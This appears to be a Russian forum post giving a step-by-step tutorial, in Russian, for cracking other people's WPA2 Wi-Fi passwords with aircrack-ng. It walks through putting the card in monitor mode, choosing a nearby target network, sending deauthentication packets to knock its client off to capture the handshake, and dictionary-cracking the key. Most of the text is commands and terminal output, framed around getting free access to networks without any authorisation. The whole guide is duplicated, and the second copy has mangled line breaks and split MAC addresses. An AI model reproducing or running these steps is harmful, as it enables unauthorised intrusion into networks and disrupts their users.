Сталкиваясь на форуме с вопросами типа "Как взломать wifi", "aircrack-ng - что это? как пользоваться?", решил ответить на эти вопросы и постараться пошагово описать процесс взлома с помощью aircrack-ng.
Метод основан на перехвате и переборе handshake. WPA2
Весь процесс будет описан на примере Debian (Linux дистрибутив). Процесс не отличается на тех же Linux mint, Ubuntu(xubuntu, lubuntu и прочее гавно и т.д.), Kali linux, Arch (Manjaro), rpm-дистрибутивы (OpenSuse, Fedora), короче на любом линуксе. Отличается лишь процесс установки aircrack-ng.
Все действия происходят в терминале (консоли).
1. Подготовка.
Что бы использовать aircrack-ng, не обязательно использовать kali linux. Он без проблем работает на любом дистрибутиве без танцев.
Что бы установить его, заходим в терминал и пишем:
sudo apt-get install aircrack-ng
Подтверждаем установку и ждём. Пакеты имеют небольшой размер, поэтому всё ставится за несколько секунд.
Всё, aircrack установлен, больше нам ничего не потребуется. Идём дальше.
2. Процесс взлома.
Дальше всё сводится тупо к вводу комманд в терминале и ожидании. Идём по порядку.
2.1 Переводим wifi карту в режим мониторинга.
Первым делом смотрим имя вашего wifi интерфейса. В терминале пишем.
sudo iwconfig
Наблюдаем следующую картину:
lo no wireless extensions.
wlan0 IEEE 802.11 ESSID: off/any
Mode: Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit: 7 RTS thr: off Fragment thr: off
Encryption key: off
Power Management: off
eth0 no wireless extensions.
Видим, что наш wifi интерфейс называется wlan0. Он может иметь и другое название, к примеру wlo0, wlan1 и т.д. Запоминаем его, или просто копируем в буфер обмена.
Теперь зная имя нашего интерфейса, можем перевести карту в режим мониторинга. Вводим в терминале:
sudo airmon-ng start wlan0
Если имя вашего интерфейса отличается от приведённого примера, просто замените wlan0 на ваше. (sudo airmon-ng start имя_вашего_интерфейса)
Теперь в терминале наблюдаем следующую картину:
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Предпоследняя строчка указывает нам, что карта перешла в режим мониторинга. (monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
Теперь имя интерфейса изменилось. В конце мы видим что оно изменилось c wlan0 на wlan0mon ([phy0]wlan0 on [phy0]wlan0mon).
Для перестраховки вводим в терминале iwconfig ещё раз.
"sudo iwconfig"
Картина с прошлого раза изменилась. А конкретно изменилось название интерфейса:
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
Retry short limit:7 RTS thr: off Fragment thr: off
Power Management: off
Имя wlan0mon, Mode:Monitor. Всё что нам нужно. Переходим к следующему шагу.
2.2 Сканируем близлежащие WIFI точки.
Для того, что бы сканировать wifi точки, находящиеся рядом с вами, с последующим выбором цели для взлома, вводим в терминале:
"sudo airodump-ng wlan0mon"
Обратите внимание на название интерфейса в конце, вводится уже интерфейс, работающий в режиме мониторинга wlan0mon. У вас оно может отличаться, к примеру mon0. Просто заменяете на ваше. sudo airodump-ng имя_вашего_интерфейса (sudo airodump-ng mon0).
В терминале теперь наблюдаем примерно следующую картину:
CH 2 ][ Elapsed: 12 s ][ 2018-04-11 13:40
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A1:B2:C3
4:E5:F6 -87 1 0 0 11 54e. WPA2 CCMP PSK WIFI-1
64:65:66:9C:8C:7C -49 39 0 0 11 54e. OPN WIFI2
C1:7D:F8:23:62:51 -63 39 0 0 6 54e. WPA2 CCMP PSK FacoN_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E81 -87 0 - 6 0 1
Будут бегать цифры, постоянно изменяться информация, что то появляться, исчезать. Теперь поподробнее рассмотрим что мы видим из всего этого, и какую информацию можем извлечь для себя.
Что обозначают некоторые элементы и что нам из этого нужно. Всё что не рассматривается - нас не интересует в данный момент):
Верхняя часть:
BSSID - mac адреса wifi точек
PWR - если объяснить по русски, то это мощность сигнала, т.е. как далеко находится от нас wifi точка. Чем значение выше, тем лучше сигнал, а значит и точка находится ближе к нам (всё конечно утрированно, различные помехи, преграды wifi сигналу и так далее.Уровень сигнала не всегда показавыает, что одна точка находится ближе другой) В нашем примере, сигнал точки WIFI2 ловит лучше, чем сигнал точки Runion_wifi, так как значение PWR выше у WIFI2.
CH - канал, на котором работает wifi точка.
ENC - защита wifi точки. OPN показывает, что на точке нет пароля для подключения по wifi. WEP, WPA или WPA2 показывают, что точка защищена паролем.
ESSID - имя wifi точки.
В нижней части нас интересуют всего 2 показателя:
BSSID - mac адрес wifi роутера (тоже, что и в верхней части)
STATION - mac адреса клиентов, подключённых в данный момент к какой либо точке wifi.
В верхней части видим доступные точки wifi. В нашем примере их 3. WIFI-1, WIFI2 и Runion_wifi. В нижней части видим подключенных на данный момент клиентов к этим wifi. Сейчас подключен только 1 клиент к одной wifi точке, конкретно к mac адресу C1:7D:F8:23:62:51. В верхyей части видим, что этот mac принадлежит FacoN_wifi. Пароль к нему мы и попытаемся заполучить.
Теперь когда цель выбрана, которую решили взломать, нажимаем в терминале ct
ctrl+c и переходим к следующему шагу.
2.3 Сканируем определённую точку, которую необходимо взломать.
Копируем mac адрес необходимой точки (в нашем случае C1:7D:F8:23:62:51 от FacoN_wifi) и вводим следующую команду в терминале:
sudo airodump-ng wlan0mon --bssid C1:7D:F8:23:62:51 -c 6 -w handshake
Что тут за что отвечает и какие значения подставлять:
wlan0mon - имя вашего интерфейса, переведённого в режим мониторинга
--bssid C1:7D:F8:23:62:51 - мак адрес сканируемой точки. значение C1:7D:F8:23:62:51 заменяете на своё, точнее на мак адрес точки, которую выбрали в качестве цели
-c 6 - канал, на котором работает целевая точка. Из предыдущей команды мы видим, что интересующая нас точка Runion_wifi работает на 6 канале (значение CH 6), поэтому мы вписываем 6. Вы же вписываете то значение, которое у вас
-w handshake - имя файла, в который сохранится пойманный нами handshake. Можно вписать любое значение, (-w gospodipomogi)
Всё, точка сканируется. В терминале должно появиться теперь нечто подобное:
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK FacoN_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E81 -22 0 - 2e 0 9 FacoN_wifi
Картина тут такая же, как и в прошлом пункте, только теперь
сканируются не все точки, а только одна, да и к тому же при ловле
handshake, он сохраниться в файле, что нам и необходимо.
Теперь существует 2 варианта развития событий:
1 - на точке нет подключённых клиентов. Решение тут одно - ждать.
Ждать подключения клиентов. Ожидание может занять большое колличество
времени, но ничего тут не поделаешь. Как говориться на халяву и уксус
сладкий. Хочешь халявы - жди. Когда клиент подключится к точке, в 95%
случаев мы автоматически перехватим handshake, и дальше останется только
последний шаг - перебор.
Как определить, что handshake пойман:
В самом правом верхнем углу в терминале появится соответствующая запись. (Естественно при включенном сканировании).
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK FacoN_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E81 -22 0 - 2e 0 9 FacoN_wifi
WPA handshake: C1:7D:F8:23:62:51
2 - это когда клиент (или клиенты) уже подключены к точке, но
handshake мы ещё не поймали. Тут нужно теперь отключить клиента
(клиентов) от точки, и ждать когда они переподключатся. В этот момент
переподключения мы и сможем поймать наш заветный handshake. Вопрос
теперь - как их отключить? Переходим к следующему шагу.
P.s.: Открытое сканирование мы не закрываем и не останавливаем, пока не поймаем handshake
2.4 Отключаем подключенных клиентов к точке и ловим handshake.
Открываем новую вкладку терминала, или новое окно, тут уже как удобней. (Новую вкладку можно открыть комбинацией клавиш ctrl+shift+t, если не открылась, то открывайте новое окно тогда.)
Вводим следующую команду в терминале, подставляя свои значения. Ещё раз повторюсь, не отключаем сканирование airodump-ng.
sudo aireplay-ng wlan0mon -0 15 --ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E81
Что тут за что отвечает и какие значения подставлять:
wlan0mon - имя вашего интерфейса, переведённого в режим мониторинга.
-0 15 - не трогаем, оставляем как есть.
--ignore-negative-one - не трогаем
-a C1:7D:F8:23:62:51 - тут вводится мак адрес wifi точки. Меняете значение на своё.
-c B5:A8:7C:5F:E81- а здесь вводится мак адрес подключённого клиента. Взять его можно из
запущенного окна сканирования airodump-ng внизу в столбце STATION. Если у
вас там пусто, значит клиента на точке ещё нет, и нужно ждать когда он
появится. Если там несколько mac адресов, то выбираете тот, который
более активный, то есть в столбце Frames будет чаще всего изменяться
цифра.
Теперь, когда подставили свои значения,
нажимаем enter и смотрим. Должны постоянно появляться новые строчки, и
вывод в терминале должен выглядеть примерно так:
15:54:01 Waiting for beacon frame (BSSID: C1:7D:F8:23:62:51) on channel 6
15:54:01 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:03 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [11|64 ACKs]
15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 3|64 ACKs]
15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 5|65 ACKs]
15:54:08 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 4|64 ACKs]
Если строчки бегут, и вывод в терминале у вас совпадает с выводом,
представленный в примере, открываем вкладку\окно терминала, где запущено
сканирование airodump-ng, и ждём заветной строчки в правом верхнем углу
терминала WPA handshake: C1:7D:F8:23:62:51
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK FacoN_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E81 -22 0 - 2e 0 9 FacoN_wifi
Если строчка не появилась, значит мы не поймали handshake. Повторяем команду:
sudo aireplay-ng wlan0mon -0 15 --ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E81
Повторяем до тех пор, пока не поймаем handshake. Если повторили раз 10-20 и до сих пор не поймали, значит пробуем сменить mac адрес клиента. (если
конечно он есть. В окне airodump-ng внизу в столбце STATION показаны мак адреса всех подключеных клиентов, выбираем другой и повторяем aireplay-ng снова).
Если строчка WPA handshake: C1:7D:F8:23:62:51 появилась, необходимо подстраховаться и проверить, действительно ли мы поймали наш handshake.
Вводим в новом окне\вкладке терминала следующую команду:
aircrack-ng handshake-01.cap
handshake-01.cap - это название файла, введённый нами ранее в самом начале пункта 2.3
Просто пример из пункта 2.3 данной статьи
sudo airodump-ng wlan0mon --bssid C1:7D:F8:23:62:51 -c 6 -w handshake
-w handshake - именно это и нужно вводить, только уже без -w
Вывод в терминале должен выглядеть примерно следующим образом:
Opening handshake-01.cap
Read 179 packets.
# BSSID ESSID Encryption
1 C1:7D:F8:23:62:51 FacoN_wifi WPA (1 handshake)
Choosing first network as target.
Opening handshake-01.cap
Please specify a dictionary (option -w).
Quitting aircrack-ng...
Обратите внимание, что первоначально мы вводили просто handshake, а получили на выходе handshake-01.cap.
Это особенность программы. .сap это расширение сохранённого файла, а
-01 дописывается автоматически, вобщем имейте ввиду. Так же учитывайте,
что расширение должно быть именно .cap. airodump сохранил файлы в
нескольких форматах, .cap, .csv и .kismet.netxml. Нас интересует именно .cap.
Всё. Теперь когда мы видим строчку WPA (1 handshake), можем остановить сканирование airodump-ng комбинацией клавиш ctrl+c. Остался последний шаг - перебор.
2.4 Перебор handshake по словарю.
Так как статья описывает взлом только лишь при помощи aircrack-ng, то и пример перебора покажу на aircrack-ng.
Естественно лучше использовать hashcat, и перебирать на gpu, но это уже совсем другая история...
Итак тут всё просто, подготавливаем словарь с паролями, и в терминале вводим следующее:
aircrack-ng -w /home/user/worlist handshake-01.cap
Тут надеюсь всё понятно.
-w /home/user/worlist - словарь с паролями, где /home/user/worlist это абсолютный путь до словаря
handshake-01.cap - наш файл с handshake. Мы его рассматривали ранее.
И всё, осталось только ждать. Должны быстро меняться цифры, буквы, короче будет визуально понятно что перебор пошёл.
Когда пароль будет подобран, в терминале должно появиться нечто подобное:
Aircrack-ng 1.2 rc4
[00:00:00] 7/9 keys tested (276.54 k/s)
Time left: 0 seconds 77.78%
KEY FOUND! [ 12345678 ]
Master Key : 64 5E 1B 0F 3C 93 74 84 B3 05 14 9D F5 64 E4 1C
56 BC B2 85 75 62 6E 97 BA 74 2A 45 17 DA 4E 93
Transient Key : 51 01 AC E7 19 1C C7 87 1D A9 70 38 AE D2 72 21
60 55 48 5F 8D D6 0A 33 B2 93 67 42 34 37 EB F7
B0 E7 B5 D8 52 8A A6 FB 83 36 4B F8 31 3B 24 F7
0D A0 75 94 F8 9F 14 7E 8A 5A 2E A4 26 12 BD 82
EAPOL HMAC : D2 D2 4B 7B 4D C4 BB 73 94 1A E0 C5 2E A9 23 B1
KEY FOUND! [ 12345678 ] - указывает нам, что ключ подобран. В нашем случае это 12345678
P.S. Многие утверждают, что этим способом хуй чё сламаешь уже не эффективно пользоваться. Скажу на личном опыте, что вполне
эффективно при грамотном составлении словаря. Чисто рандомным словарёмбудете год ломать на процессоре. Поэтому для перебора handshake юзайте GPU, и всё подберётся за час-другой. Благо пароли на роутерах до сих пор легко поддаются взлому.
Метод основан на перехвате и переборе handshake. WPA2
Весь процесс будет описан на примере Debian (Linux дистрибутив). Процесс не отличается на тех же Linux mint, Ubuntu(xubuntu, lubuntu и прочее гавно и т.д.), Kali linux, Arch (Manjaro), rpm-дистрибутивы (OpenSuse, Fedora), короче на любом линуксе. Отличается лишь процесс установки aircrack-ng.
Все действия происходят в терминале (консоли).
1. Подготовка.
Что бы использовать aircrack-ng, не обязательно использовать kali linux. Он без проблем работает на любом дистрибутиве без танцев.
Что бы установить его, заходим в терминал и пишем:
sudo apt-get install aircrack-ng
Подтверждаем установку и ждём. Пакеты имеют небольшой размер, поэтому всё ставится за несколько секунд.
Всё, aircrack установлен, больше нам ничего не потребуется. Идём дальше.
2. Процесс взлома.
Дальше всё сводится тупо к вводу комманд в терминале и ожидании. Идём по порядку.
2.1 Переводим wifi карту в режим мониторинга.
Первым делом смотрим имя вашего wifi интерфейса. В терминале пишем.
sudo iwconfig
Наблюдаем следующую картину:
lo no wireless extensions.
wlan0 IEEE 802.11 ESSID: off/any
Mode: Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit: 7 RTS thr: off Fragment thr: off
Encryption key: off
Power Management: off
eth0 no wireless extensions.
Видим, что наш wifi интерфейс называется wlan0. Он может иметь и другое название, к примеру wlo0, wlan1 и т.д. Запоминаем его, или просто копируем в буфер обмена.
Теперь зная имя нашего интерфейса, можем перевести карту в режим мониторинга. Вводим в терминале:
sudo airmon-ng start wlan0
Если имя вашего интерфейса отличается от приведённого примера, просто замените wlan0 на ваше. (sudo airmon-ng start имя_вашего_интерфейса)
Теперь в терминале наблюдаем следующую картину:
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Предпоследняя строчка указывает нам, что карта перешла в режим мониторинга. (monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
Теперь имя интерфейса изменилось. В конце мы видим что оно изменилось c wlan0 на wlan0mon ([phy0]wlan0 on [phy0]wlan0mon).
Для перестраховки вводим в терминале iwconfig ещё раз.
"sudo iwconfig"
Картина с прошлого раза изменилась. А конкретно изменилось название интерфейса:
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
Retry short limit:7 RTS thr: off Fragment thr: off
Power Management: off
Имя wlan0mon, Mode:Monitor. Всё что нам нужно. Переходим к следующему шагу.
2.2 Сканируем близлежащие WIFI точки.
Для того, что бы сканировать wifi точки, находящиеся рядом с вами, с последующим выбором цели для взлома, вводим в терминале:
"sudo airodump-ng wlan0mon"
Обратите внимание на название интерфейса в конце, вводится уже интерфейс, работающий в режиме мониторинга wlan0mon. У вас оно может отличаться, к примеру mon0. Просто заменяете на ваше. sudo airodump-ng имя_вашего_интерфейса (sudo airodump-ng mon0).
В терминале теперь наблюдаем примерно следующую картину:
CH 2 ][ Elapsed: 12 s ][ 2018-04-11 13:40
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A1:B2:C3
4:E5:F6 -87 1 0 0 11 54e. WPA2 CCMP PSK WIFI-164:65:66:9C:8C:7C -49 39 0 0 11 54e. OPN WIFI2
C1:7D:F8:23:62:51 -63 39 0 0 6 54e. WPA2 CCMP PSK FacoN_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E8
1 -87 0 - 6 0 1Будут бегать цифры, постоянно изменяться информация, что то появляться, исчезать. Теперь поподробнее рассмотрим что мы видим из всего этого, и какую информацию можем извлечь для себя.
Что обозначают некоторые элементы и что нам из этого нужно. Всё что не рассматривается - нас не интересует в данный момент):
Верхняя часть:
BSSID - mac адреса wifi точек
PWR - если объяснить по русски, то это мощность сигнала, т.е. как далеко находится от нас wifi точка. Чем значение выше, тем лучше сигнал, а значит и точка находится ближе к нам (всё конечно утрированно, различные помехи, преграды wifi сигналу и так далее.Уровень сигнала не всегда показавыает, что одна точка находится ближе другой) В нашем примере, сигнал точки WIFI2 ловит лучше, чем сигнал точки Runion_wifi, так как значение PWR выше у WIFI2.
CH - канал, на котором работает wifi точка.
ENC - защита wifi точки. OPN показывает, что на точке нет пароля для подключения по wifi. WEP, WPA или WPA2 показывают, что точка защищена паролем.
ESSID - имя wifi точки.
В нижней части нас интересуют всего 2 показателя:
BSSID - mac адрес wifi роутера (тоже, что и в верхней части)
STATION - mac адреса клиентов, подключённых в данный момент к какой либо точке wifi.
В верхней части видим доступные точки wifi. В нашем примере их 3. WIFI-1, WIFI2 и Runion_wifi. В нижней части видим подключенных на данный момент клиентов к этим wifi. Сейчас подключен только 1 клиент к одной wifi точке, конкретно к mac адресу C1:7D:F8:23:62:51. В верхyей части видим, что этот mac принадлежит FacoN_wifi. Пароль к нему мы и попытаемся заполучить.
Теперь когда цель выбрана, которую решили взломать, нажимаем в терминале ct
ctrl+c и переходим к следующему шагу.
2.3 Сканируем определённую точку, которую необходимо взломать.
Копируем mac адрес необходимой точки (в нашем случае C1:7D:F8:23:62:51 от FacoN_wifi) и вводим следующую команду в терминале:
sudo airodump-ng wlan0mon --bssid C1:7D:F8:23:62:51 -c 6 -w handshake
Что тут за что отвечает и какие значения подставлять:
wlan0mon - имя вашего интерфейса, переведённого в режим мониторинга
--bssid C1:7D:F8:23:62:51 - мак адрес сканируемой точки. значение C1:7D:F8:23:62:51 заменяете на своё, точнее на мак адрес точки, которую выбрали в качестве цели
-c 6 - канал, на котором работает целевая точка. Из предыдущей команды мы видим, что интересующая нас точка Runion_wifi работает на 6 канале (значение CH 6), поэтому мы вписываем 6. Вы же вписываете то значение, которое у вас
-w handshake - имя файла, в который сохранится пойманный нами handshake. Можно вписать любое значение, (-w gospodipomogi)
Всё, точка сканируется. В терминале должно появиться теперь нечто подобное:
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK FacoN_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E8
1 -22 0 - 2e 0 9 FacoN_wifi Картина тут такая же, как и в прошлом пункте, только теперь
сканируются не все точки, а только одна, да и к тому же при ловле
handshake, он сохраниться в файле, что нам и необходимо.
Теперь существует 2 варианта развития событий:
1 - на точке нет подключённых клиентов. Решение тут одно - ждать.
Ждать подключения клиентов. Ожидание может занять большое колличество
времени, но ничего тут не поделаешь. Как говориться на халяву и уксус
сладкий. Хочешь халявы - жди. Когда клиент подключится к точке, в 95%
случаев мы автоматически перехватим handshake, и дальше останется только
последний шаг - перебор.
Как определить, что handshake пойман:
В самом правом верхнем углу в терминале появится соответствующая запись. (Естественно при включенном сканировании).
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK FacoN_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E8
1 -22 0 - 2e 0 9 FacoN_wifi WPA handshake: C1:7D:F8:23:62:51
2 - это когда клиент (или клиенты) уже подключены к точке, но
handshake мы ещё не поймали. Тут нужно теперь отключить клиента
(клиентов) от точки, и ждать когда они переподключатся. В этот момент
переподключения мы и сможем поймать наш заветный handshake. Вопрос
теперь - как их отключить? Переходим к следующему шагу.
P.s.: Открытое сканирование мы не закрываем и не останавливаем, пока не поймаем handshake
2.4 Отключаем подключенных клиентов к точке и ловим handshake.
Открываем новую вкладку терминала, или новое окно, тут уже как удобней. (Новую вкладку можно открыть комбинацией клавиш ctrl+shift+t, если не открылась, то открывайте новое окно тогда.)
Вводим следующую команду в терминале, подставляя свои значения. Ещё раз повторюсь, не отключаем сканирование airodump-ng.
sudo aireplay-ng wlan0mon -0 15 --ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E8
1Что тут за что отвечает и какие значения подставлять:
wlan0mon - имя вашего интерфейса, переведённого в режим мониторинга.
-0 15 - не трогаем, оставляем как есть.
--ignore-negative-one - не трогаем
-a C1:7D:F8:23:62:51 - тут вводится мак адрес wifi точки. Меняете значение на своё.
-c B5:A8:7C:5F:E8
1- а здесь вводится мак адрес подключённого клиента. Взять его можно из запущенного окна сканирования airodump-ng внизу в столбце STATION. Если у
вас там пусто, значит клиента на точке ещё нет, и нужно ждать когда он
появится. Если там несколько mac адресов, то выбираете тот, который
более активный, то есть в столбце Frames будет чаще всего изменяться
цифра.
Теперь, когда подставили свои значения,
нажимаем enter и смотрим. Должны постоянно появляться новые строчки, и
вывод в терминале должен выглядеть примерно так:
15:54:01 Waiting for beacon frame (BSSID: C1:7D:F8:23:62:51) on channel 6
15:54:01 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:03 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [11|64 ACKs]15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 3|64 ACKs]15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 5|65 ACKs]15:54:08 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 4|64 ACKs]Если строчки бегут, и вывод в терминале у вас совпадает с выводом,
представленный в примере, открываем вкладку\окно терминала, где запущено
сканирование airodump-ng, и ждём заветной строчки в правом верхнем углу
терминала WPA handshake: C1:7D:F8:23:62:51
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK FacoN_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E8
1 -22 0 - 2e 0 9 FacoN_wifi Если строчка не появилась, значит мы не поймали handshake. Повторяем команду:
sudo aireplay-ng wlan0mon -0 15 --ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E8
1Повторяем до тех пор, пока не поймаем handshake. Если повторили раз 10-20 и до сих пор не поймали, значит пробуем сменить mac адрес клиента. (если
конечно он есть. В окне airodump-ng внизу в столбце STATION показаны мак адреса всех подключеных клиентов, выбираем другой и повторяем aireplay-ng снова).
Если строчка WPA handshake: C1:7D:F8:23:62:51 появилась, необходимо подстраховаться и проверить, действительно ли мы поймали наш handshake.
Вводим в новом окне\вкладке терминала следующую команду:
aircrack-ng handshake-01.cap
handshake-01.cap - это название файла, введённый нами ранее в самом начале пункта 2.3
Просто пример из пункта 2.3 данной статьи
sudo airodump-ng wlan0mon --bssid C1:7D:F8:23:62:51 -c 6 -w handshake
-w handshake - именно это и нужно вводить, только уже без -w
Вывод в терминале должен выглядеть примерно следующим образом:
Opening handshake-01.cap
Read 179 packets.
# BSSID ESSID Encryption
1 C1:7D:F8:23:62:51 FacoN_wifi WPA (1 handshake)
Choosing first network as target.
Opening handshake-01.cap
Please specify a dictionary (option -w).
Quitting aircrack-ng...
Обратите внимание, что первоначально мы вводили просто handshake, а получили на выходе handshake-01.cap.
Это особенность программы. .сap это расширение сохранённого файла, а
-01 дописывается автоматически, вобщем имейте ввиду. Так же учитывайте,
что расширение должно быть именно .cap. airodump сохранил файлы в
нескольких форматах, .cap, .csv и .kismet.netxml. Нас интересует именно .cap.
Всё. Теперь когда мы видим строчку WPA (1 handshake), можем остановить сканирование airodump-ng комбинацией клавиш ctrl+c. Остался последний шаг - перебор.
2.4 Перебор handshake по словарю.
Так как статья описывает взлом только лишь при помощи aircrack-ng, то и пример перебора покажу на aircrack-ng.
Естественно лучше использовать hashcat, и перебирать на gpu, но это уже совсем другая история...
Итак тут всё просто, подготавливаем словарь с паролями, и в терминале вводим следующее:
aircrack-ng -w /home/user/worlist handshake-01.cap
Тут надеюсь всё понятно.
-w /home/user/worlist - словарь с паролями, где /home/user/worlist это абсолютный путь до словаря
handshake-01.cap - наш файл с handshake. Мы его рассматривали ранее.
И всё, осталось только ждать. Должны быстро меняться цифры, буквы, короче будет визуально понятно что перебор пошёл.
Когда пароль будет подобран, в терминале должно появиться нечто подобное:
Aircrack-ng 1.2 rc4
[00:00:00] 7/9 keys tested (276.54 k/s)
Time left: 0 seconds 77.78%
KEY FOUND! [ 12345678 ]
Master Key : 64 5E 1B 0F 3C 93 74 84 B3 05 14 9D F5 64 E4 1C
56 BC B2 85 75 62 6E 97 BA 74 2A 45 17 DA 4E 93
Transient Key : 51 01 AC E7 19 1C C7 87 1D A9 70 38 AE D2 72 21
60 55 48 5F 8D D6 0A 33 B2 93 67 42 34 37 EB F7
B0 E7 B5 D8 52 8A A6 FB 83 36 4B F8 31 3B 24 F7
0D A0 75 94 F8 9F 14 7E 8A 5A 2E A4 26 12 BD 82
EAPOL HMAC : D2 D2 4B 7B 4D C4 BB 73 94 1A E0 C5 2E A9 23 B1
KEY FOUND! [ 12345678 ] - указывает нам, что ключ подобран. В нашем случае это 12345678
P.S. Многие утверждают, что этим способом хуй чё сламаешь уже не эффективно пользоваться. Скажу на личном опыте, что вполне
эффективно при грамотном составлении словаря. Чисто рандомным словарёмбудете год ломать на процессоре. Поэтому для перебора handshake юзайте GPU, и всё подберётся за час-другой. Благо пароли на роутерах до сих пор легко поддаются взлому.